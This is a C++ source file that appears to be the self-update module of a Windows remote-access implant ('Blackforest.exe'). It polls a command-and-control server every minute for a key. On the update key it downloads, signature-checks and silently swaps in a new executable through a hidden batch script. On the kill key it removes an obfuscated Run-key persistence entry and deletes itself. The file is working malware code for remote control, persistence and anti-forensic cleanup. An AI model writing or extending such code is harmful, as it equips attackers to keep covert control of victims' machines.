#include "agent/modules/maintenance/updater.hpp"
#include "agent/utils/rsa.hpp"
#include "agent/utils/obfuscator.hpp" // Added
#include <vector>
#include <windows.h>
#include <wininet.h>
#include <urlmon.h>
#include <fstream>
#include <sstream>
#include <winreg.h> // Added for registry operations

#pragma comment(lib, "urlmon.lib")

void Updater::Start(const std::string& c2_ip, int port, const std::string& updateKey, const std::string& killKey) {
    std::string baseUrl = "http://" + c2_ip + ":" + std::to_string(port) + "/";
    std::string checkUrl = baseUrl + "update.txt";
    std::string exeUrl = baseUrl + "Blackforest.exe";
    
    char tempPath[MAX_PATH];
    GetTempPathA(MAX_PATH, tempPath);
    std::string checkFile = std::string(tempPath) + "update_check.txt";
    std::string newExe = std::string(tempPath) + "new_agent.exe";
    std::string batFile = std::string(tempPath) + "update.bat";

    while(true) {
        Sleep(60000); // Check every 60 seconds

        // 1. Download Command File
        // Delete cache to ensure fresh download
        DeleteUrlCacheEntryA(checkUrl.c_str());
        HRESULT hr = URLDownloadToFileA(NULL, checkUrl.c_str(), checkFile.c_str(), 0, NULL);
        
        if(hr == S_OK) {
            // 2. Read Content
            std::ifstream f(checkFile);
            std::string content;
            if(f.good()) {
                std::getline(f, content);
            }
            f.close();
            DeleteFileA(checkFile.c_str()); // Cleanup

            // 3. Verify Key
            // Trim whitespace
            content.erase(content.find_last_not_of(" \n\r\t")+1);

            // --- KILL SWITCH ---
            if(content == killKey) {
                // Remove Persistence
                HKEY hKey;
                if(RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                    RegDeleteValueA(hKey, Obfuscator::Deobfuscate({0x35, 0x1b, 0x16, 0x14, 0x1c, 0x11, 0x18, 0x5, 0x12, 0x4, 0x3, 0x22, 0x7, 0x13, 0x16, 0x3, 0x12, 0x5}, 0x77).c_str());
                    RegCloseKey(hKey);
                }

                // Get Our Path
                char currentPath[MAX_PATH];
                GetModuleFileNameA(NULL, currentPath, MAX_PATH);

                // Suicide Script
                std::string killBat = std::string(tempPath) + "kill.bat";
                std::ofstream bat(killBat);
                bat << "@echo off\n";
                bat << "timeout /t 5 /nobreak > NUL\n";
                bat << "del /f /q \"" << currentPath << "\"\n";
                // Optionally remove directory if empty?
                bat << "del \"%~f0\" & exit\n";
                bat.close();

                ShellExecuteA(NULL, "open", killBat.c_str(), NULL, NULL, SW_HIDE);
                exit(0);
            }
            
            // --- UPDATE ---
            if(content == updateKey) {
                // 4. Trigger Update
                // Download new Exe to temp
                DeleteUrlCacheEntryA(exeUrl.c_str());
                if(URLDownloadToFileA(NULL, exeUrl.c_str(), newExe.c_str(), 0, NULL) == S_OK) {
                    
                    // --- SIGNATURE VERIFICATION (Level 5) ---
                    std::string sigUrl = baseUrl + "update.sig";
                    std::string sigFile = std::string(tempPath) + "update.sig";
                    
                    DeleteUrlCacheEntryA(sigUrl.c_str());
                    if(URLDownloadToFileA(NULL, sigUrl.c_str(), sigFile.c_str(), 0, NULL) != S_OK) {
                         DeleteFileA(newExe.c_str());
                         continue; // Missing signature -> abort
                    }
                    
                    // Read Exe
                    std::ifstream exeStream(newExe, std::ios::binary);
                    std::vector<unsigned char> exeData((std::istreambuf_iterator<char>(exeStream)), std::istreambuf_iterator<char>());
                    exeStream.close();
                    
                    // Read Sig
                    std::ifstream sigStream(sigFile, std::ios::binary);
                    std::vector<unsigned char> sigData((std::istreambuf_iterator<char>(sigStream)), std::istreambuf_iterator<char>());
                    sigStream.close();
                    
                    // Verify
                    RSA rsa;
                    // Real Public Key Blob - Generated by c2/generate_keys.py
                    std::vector<unsigned char> pubKeyBlob = {
                        0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x08, 0x00, 0x00, 
                        0x01, 0x00, 0x01, 0x00, 0x93, 0x01, 0xc0, 0x7d, 0x53, 0x86, 0x7d, 0xe7, 0xc2, 0x8d, 0x05, 0xa3, 
                        0x68, 0x67, 0xd1, 0x83, 0x39, 0x85, 0x31, 0x83, 0x83, 0x29, 0xe5, 0x10, 0x71, 0x56, 0x7d, 0x41, 
                        0x86, 0x0c, 0xd0, 0x9a, 0xde, 0xc4, 0x15, 0x17, 0x3e, 0x79, 0xc9, 0x5d, 0x77, 0x77, 0x33, 0x1b, 
                        0x74, 0xd5, 0x6a, 0x8d, 0xbb, 0xc0, 0x67, 0xbb, 0x2b, 0x23, 0x03, 0x77, 0x94, 0xa7, 0x06, 0x97, 
                        0xbc, 0xdd, 0xc0, 0x0d, 0x1f, 0x1d, 0xe0, 0x62, 0x01, 0xfb, 0x50, 0x71, 0x78, 0x4a, 0x25, 0xd1, 
                        0xa6, 0x20, 0x58, 0xb1, 0xdd, 0x8e, 0x83, 0xad, 0xa5, 0xa4, 0x25, 0xba, 0x2b, 0x02, 0xec, 0x4e, 
                        0x70, 0x8b, 0x35, 0x00, 0xa3, 0x71, 0x5e, 0xa8, 0x36, 0x9b, 0xd3, 0x65, 0x82, 0x1b, 0x55, 0x6e, 
                        0x0d, 0xb8, 0x7f, 0x0d, 0x6e, 0x06, 0x34, 0x9e, 0xec, 0x7b, 0xaf, 0x6e, 0x0d, 0x13, 0x54, 0xd9, 
                        0x66, 0xaf, 0x5c, 0x13, 0x18, 0xbf, 0x44, 0x3f, 0xa2, 0x74, 0xc6, 0x88, 0x69, 0x5e, 0xa8, 0x04, 
                        0xa7, 0xc3, 0x7d, 0x54, 0x8e, 0xc3, 0xcc, 0x8a, 0xb1, 0x65, 0x07, 0x70, 0x49, 0x94, 0xf8, 0x68, 
                        0xd9, 0xbf, 0x6c, 0x08, 0x00, 0x8f, 0xf5, 0xa5, 0x73, 0xb6, 0xf4, 0x09, 0x70, 0xab, 0xac, 0xb6, 
                        0xd3, 0x47, 0x40, 0x4d, 0xb7, 0xcb, 0x21, 0x98, 0x1d, 0x30, 0x66, 0x42, 0xe5, 0x60, 0xfc, 0x47, 
                        0xdb, 0x35, 0xd4, 0x11, 0x64, 0xe5, 0xbb, 0xa1, 0x16, 0x4d, 0x42, 0xef, 0xc5, 0x35, 0x21, 0xd8, 
                        0x22, 0xc5, 0x81, 0xf3, 0x18, 0xd9, 0x2d, 0xca, 0xb2, 0x33, 0xd7, 0xfe, 0xcf, 0x97, 0xb5, 0x52, 
                        0x56, 0x47, 0xb7, 0xbd, 0x5c, 0xf9, 0x02, 0x7b, 0xdf, 0x7e, 0xfe, 0x6c, 0x15, 0x92, 0x70, 0x70, 
                        0xb3, 0x3f, 0xd0, 0xf4, 0x1f, 0x66, 0x26, 0xc8, 0xb4, 0x96, 0x65, 0xee, 0x1b, 0xe0, 0x7d, 0xfe, 
                        0xc5, 0xd5, 0xc2, 0xc0
                    };
                    rsa.ImportPublicKey(pubKeyBlob);
                    
                    if(!rsa.VerifySignature(exeData, sigData)) {
                        // INVALID SIGNATURE
                        DeleteFileA(newExe.c_str());
                        DeleteFileA(sigFile.c_str());
                        continue; // Abort (Trojan horse rejected)
                    }
                    
                    
                    // Clean sig
                    DeleteFileA(sigFile.c_str()); 
                    // --- END VERIFICATION ---

                    // Get Current Path
                    char currentPath[MAX_PATH];
                    GetModuleFileNameA(NULL, currentPath, MAX_PATH);

                    // Size check disabled - RSA signature is sufficient validation
                    /*
                    WIN32_FILE_ATTRIBUTE_DATA curInfo, newInfo;
                    if(GetFileAttributesExA(currentPath, GetFileExInfoStandard, &curInfo) &&
                       GetFileAttributesExA(newExe.c_str(), GetFileExInfoStandard, &newInfo)) {
                        
                        if(curInfo.nFileSizeLow == newInfo.nFileSizeLow) {
                             DeleteFileA(newExe.c_str());
                             continue;
                        }
                    }
                    */

                    // Create Batch Script for replacement
                    std::ofstream bat(batFile);
                    bat << "@echo off\n";
                    bat << "timeout /t 5 /nobreak > NUL\n"; // Wait for us to exit
                    bat << "move /y \"" << newExe << "\" \"" << currentPath << "\"\n";
                    bat << "start \"\" \"" << currentPath << "\"\n";
                    bat << "del \"%~f0\" & exit\n";
                    bat.close();

                    // Execute Batch
                    ShellExecuteA(NULL, "open", batFile.c_str(), NULL, NULL, SW_HIDE);
                    
                    // Die
                    exit(0);
                }
            }
        }
    }
}
